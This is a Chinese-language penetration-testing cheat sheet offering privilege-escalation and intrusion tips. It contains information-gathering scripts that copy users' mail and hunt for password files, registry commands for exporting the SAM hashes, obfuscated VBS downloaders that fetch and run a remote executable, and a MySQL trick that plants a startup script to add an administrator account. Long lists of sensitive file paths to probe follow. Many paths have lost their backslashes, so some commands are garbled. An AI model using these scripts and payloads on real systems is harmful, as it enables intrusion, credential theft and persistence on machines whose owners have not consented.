提權、滲透、經驗、技巧總結大全三
tar 資料夾打包:
1、tar打包:
tar -cvf /home/public_html/*.tar /home/public_html/–exclude=排除檔案*.gif 排除目錄 /xx/xx/*
alzip打包(韓國) alzip -a D:WEB d:web*.rar
{
注:
關於tar的打包方式,linux不以副檔名來決定檔案型別。
若壓縮的話tar -ztf *.tar.gz 檢視壓縮包裡內容 tar -zxf *.tar.gz 解壓
那麼用這條比較好 tar -czf /home/public_html/*.tar.gz /home/public_html/–exclude= 排除檔案*.gif 排除目錄 /xx/xx/*
}
提權先執行systeminfo
token 漏洞補丁號 KB956572
Churrasco kb952004
命令列RAR打包~~·
rar a -k -r -s -m3 c:1.rar c:folder
收集系統資訊的指令碼:
for window:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd
tree -F
for linux:
#!/bin/bash
echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail……######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo `u`r id is` `id`
echo ###atq&crontab#####
atq
crontab -l
echo #####about var#####
set
echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
ipconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh
echo ######service####
chkconfig –list
for i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
###maybe can use “tree /”###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
ethash 不免殺怎麼獲取本機 hash:
首先匯出登錄檔:
Windows 2000:regedit /e d:aa.reg “HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”
Windows 2003:reg export “HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers” d:aa.reg
注意許可權問題,一般登錄檔預設sam目錄是不能訪問的。需要設定為完全控制以後才可以訪問(介面登入的需要注意,system許可權可以忽略)。
接下來就簡單了,把匯出的登錄檔,down 到本機,修改登錄檔頭匯入本機,然後用抓去hash的工具抓本地使用者就OK了
hash 抓完了記得把自己的賬戶密碼改過來哦!
當 GetHashes 獲取不到 hash 時,可以用冰刃把 sam 複製到桌面。據我所知,某人是用這個方法虛擬機器多次因為不知道密碼而進不去!~
vbs 下載者:
1:
echo Set sGet = createObject(“ADODB.Stream”) >>c:windowscftmon.vbs
echo sGet.Mode = 3 >>c:windowscftmon.vbs
echo sGet.Type = 1 >>c:windowscftmon.vbs
echo sGet.Open() >>c:windowscftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:windowscftmon.vbs
echo sGet.SaveToFile “c:windowse.exe”,2 >>c:windowscftmon.vbs
echo Set objShell = CreateObject(“Wscript.Shell”) >>c:windowscftmon.vbs
echo objshell.run “””c:windowse.exe””” >>c:windowscftmon.vbs
cftmon.vbs
2:
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1=”Mi”+”cro”+”soft”+”.”+”XML”+”HTTP”:s2=”ADO”+”DB”+”.”+”Stream”
Set xPost = CreateObject(s1):xPost.Open “GET”,iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:down.vbs http://xxxx/mm.exe c:mm.exe
create table a (cmd text):
insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”);
insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”);
select * from a into outfile “C:\Documents and Settings\All Users\「開始」選單\程式\啟動\a.vbs“;
Cmd 下目錄的操作技巧:
列出d的所有目錄:
for /d %i in (d:freehost*) do @echo %i
把當前路徑下資料夾的名字只有1-3個字母的顯示出來:
for /d %i in (???) do @echo %i
以當前目錄為搜尋路徑,把當前目錄與下面的子目錄的全部EXE檔案列出:
for /r %i in (*.exe) do @echo %i
以指定目錄為搜尋路徑,把當前目錄與下面的子目錄的所有檔案列出:
for /r “f:freehosthmadesignweb” %i in (*.*) do @echo %i
這個會顯示a.txt裡面的內容,因為/f的作用,會讀出a.txt中:
for /f %i in (c:1.txt) do echo %i
delims=後的空格是分隔符,tokens是取第幾個位置:
for /f “tokens=2 delims= ” %i in (a.txt) do echo %i
Linux 系統下的一些常見路徑:
/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
Windows 系統下的一些常見路徑(可以將c盤換成d,e盤,比如星外虛擬主機跟華眾得,一般都放在d盤):
c:windowsphp.ini
c:oot.ini
c:1.txt
c:a.txt
c:CMailServerconfig.ini
c:CMailServerCMailServer.exe
c:CMailServerWebMailindex.asp
c:program filesCMailServerCMailServer.exe
c:program filesCMailServerWebMailindex.asp
C:WinWebMailSysInfo.ini
C:WinWebMailWebdefault.asp
C:WINDOWSFreeHost32.dll
C:WINDOWS7i24iislog4.exe
C:WINDOWS7i24tool.exe
c:hzhostdatabasesurl.asp
c:hzhosthzclient.exe
C:Documents and SettingsAll Users「開始」選單程式7i24虛擬主機管理平臺自動設定[受控端].lnk
C:Documents and SettingsAll Users「開始」選單程式Serv-UServ-U Administrator.lnk
C:WINDOWSweb.config
c:webindex.html
c:wwwindex.html
c:WWWROOTindex.html
c:websiteindex.html
c:webindex.asp
c:wwwindex.asp
c:wwwsiteindex.asp
c:WWWROOTindex.asp
c:webindex.php
c:wwwindex.php
c:WWWROOTindex.php
c:WWWsiteindex.php
c:webdefault.html
c:wwwdefault.html
c:WWWROOTdefault.html
c:websitedefault.html
c:webdefault.asp
c:wwwdefault.asp
c:wwwsitedefault.asp
c:WWWROOTdefault.asp
c:webdefault.php
c:wwwdefault.php
c:WWWROOTdefault.php
c:WWWsitedefault.php
C:Inetpubwwwrootpagerror.gif
c:windows
otepad.exe
c:winnt
otepad.exe
C:Program FilesMicrosoft OfficeOFFICE10winword.exe
C:Program FilesMicrosoft OfficeOFFICE11winword.exe
C:Program FilesMicrosoft OfficeOFFICE12winword.exe
C:Program FilesInternet ExplorerIEXPLORE.EXE
C:Program Fileswinrar
ar.exe
C:Program Files360360Safe360safe.exe
C:Program Files360Safe360safe.exe
C:Documents and SettingsAdministratorApplication Data360Safe360Examine360Examine.log
c:
avbinstore.ini
c:
ising.ini
C:Program FilesRisingRavRsTask.xml
C:Documents and SettingsAll UsersStart Menudesktop.ini
C:Documents and SettingsAdministratorMy DocumentsDefault.rdp
C:Documents and SettingsAdministratorCookiesindex.dat
C:Documents and SettingsAdministratorMy Documents新建 文字文件.txt
C:Documents and SettingsAdministrator桌面新建 文字文件.txt
C:Documents and SettingsAdministratorMy Documents1.txt
C:Documents and SettingsAdministrator桌面1.txt
C:Documents and SettingsAdministratorMy Documentsa.txt
C:Documents and SettingsAdministrator桌面a.txt
C:Documents and SettingsAll UsersDocumentsMy PicturesSample PicturesBlue hills.jpg
E:Inetpubwwwrootaspnet_clientsystem_web1_1_4322SmartNav.htm
C:Program FilesRhinoSoft.comServ-UVersion.txt
C:Program FilesRhinoSoft.comServ-UServUDaemon.ini
C:Program FilesSymantecSYMEVENT.INF
C:Program FilesMicrosoft SQL Server80ToolsBinnsqlmangr.exe
C:Program FilesMicrosoft SQL ServerMSSQLDatamaster.mdf
C:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLDatamaster.mdf
C:Program FilesMicrosoft SQL ServerMSSQL.2MSSQLDatamaster.mdf
C:Program FilesMicrosoft SQL Server80ToolsHTMLdatabase.htm
C:Program FilesMicrosoft SQL ServerMSSQLREADME.TXT
C:Program FilesMicrosoft SQL Server90ToolsBinDdsShapes.dll
C:Program FilesMicrosoft SQL ServerMSSQLsqlsunin.ini
C:MySQLMySQL Server 5.0my.ini
C:Program FilesMySQLMySQL Server 5.0my.ini
C:Program FilesMySQLMySQL Server 5.0datamysqluser.frm
C:Program FilesMySQLMySQL Server 5.0COPYING
C:Program FilesMySQLMySQL Server 5.0sharemysql_fix_privilege_tables.sql
C:Program FilesMySQLMySQL Server 4.1inmysql.exe
c:MySQLMySQL Server 4.1inmysql.exe
c:MySQLMySQL Server 4.1datamysqluser.frm
C:Program FilesOracleoraconfigLpk.dll
C:WINDOWSMicrosoft.NETFrameworkv2.0.50727aspnet_state.exe
C:WINDOWSsystem32inetsrvw3wp.exe
C:WINDOWSsystem32inetsrvinetinfo.exe
C:WINDOWSsystem32inetsrvMetaBase.xml
C:WINDOWSsystem32inetsrviisa, dmpwdachg.asp
C:WINDOWSsystem32configdefault.LOG
C:WINDOWSsystem32configsam
C:WINDOWSsystem32configsystem
c:CMailServerconfig.ini
c:program filesCMailServerconfig.ini
c: omcat6 omcat6inversion.sh
c: omcat6inversion.sh
c: omcatinversion.sh
c:program files omcat6inversion.sh
C:Program FilesApache Software FoundationTomcat 6.0inversion.sh
c:Program FilesApache Software FoundationTomcat 6.0logsisapi_redirect.log
c:Apache2Apache2inApache.exe
c:Apache2inApache.exe
c:Apache2phplicense.txt
C:Program FilesApache GroupApache2inApache.exe
c:Program FilesQQ2007qq.exe
c:Program FilesTencent, qqUser.db
c:Program FilesTencentqqqq.exe
c:Program FilesTencentqqinqq.exe
c:Program FilesTencentqq2009qq.exe
c:Program FilesTencentqq2008qq.exe
c:Program FilesTencentqq2010inqq.exe
c:Program FilesTencentqqUsersAll UsersRegistry.db
C:Program FilesTencentTMTMDllsQQZip.dll
c:Program FilesTencentTmBinTxplatform.exe
c:Program FilesTencentRTXServerAppConfig.xml
C:Program FilesFoxmalFoxmail.exe
C:Program FilesFoxmalaccounts.cfg
C:Program Files encentFoxmalFoxmail.exe
C:Program Files encentFoxmalaccounts.cfg
C:Program FilesLeapFTP 3.0LeapFTP.exe
C:Program FilesLeapFTPLeapFTP.exe
c:Program FilesGlobalSCAPECuteFTP Procftppro.exe
c:Program FilesGlobalSCAPECuteFTP Pro
otes.txt
C:Program FilesFlashFXPFlashFXP.ini
C:Program FilesFlashFXPflashfxp.exe
c:Program FilesOraclein
egsvr32.exe
c:Program Files騰訊遊戲QQGAME
eadme.txt
c:Program Files encent騰訊遊戲QQGAME
eadme.txt
c:Program Files encentQQGAME
eadme.txt
C:Program FilesStormIIStorm.exe
相關文章
- 滲透測試——提權方式總結
- 滲透測試技巧總結
- 滲透之——資料庫提權資料庫
- 網站滲透總結之Getshell用法大全網站
- 滲透測試技巧總結更新篇2
- 無線滲透總結
- Windows提權總結Windows
- SP_OACreate提權經驗
- 12、強大的內網域滲透提權分析工具——BloodHound內網
- Linux提權————Linux下三種不同方式的提權技巧Linux
- 網站滲透思路全方面總結網站
- 滲透測試常用術語總結
- Sa提權Sql語句大全SQL
- 網站安全滲透測試公司心得總結網站
- 滲透測試公司 入職後的個人經驗分享
- 工作經驗總結
- vue經驗總結Vue
- mysql經驗總結MySql
- Java經驗總結Java
- Storm經驗總結ORM
- Resin 經驗總結
- 十年程式設計經驗總結,三點技巧幫你提升程式碼能力!程式設計
- 網路滲透實驗四
- 檔案上傳漏洞全面滲透姿勢總結
- 17、內網滲透測試定位技術總結內網
- linux滲透測試技巧2則Linux
- [Tools]內網滲透SMB轉發技巧內網
- IT職場管理經驗總結
- Eclipse經驗總結Eclipse
- mysql使用經驗總結MySql
- 做題經驗總結
- 內網滲透之——mssql資料庫提權之——xp_cmdshell執行系統命令內網SQL資料庫
- 總結一些滲透測試中資訊收集思路
- kali下的滲透wifi實驗WiFi
- 第六章-實用滲透技巧-1:針對雲環境的滲透
- 17 年程式設計生涯的三大經驗總結程式設計
- 17年程式設計生涯的三大經驗總結程式設計
- 滲透測試的WINDOWS NTFS技巧集合(一)Windows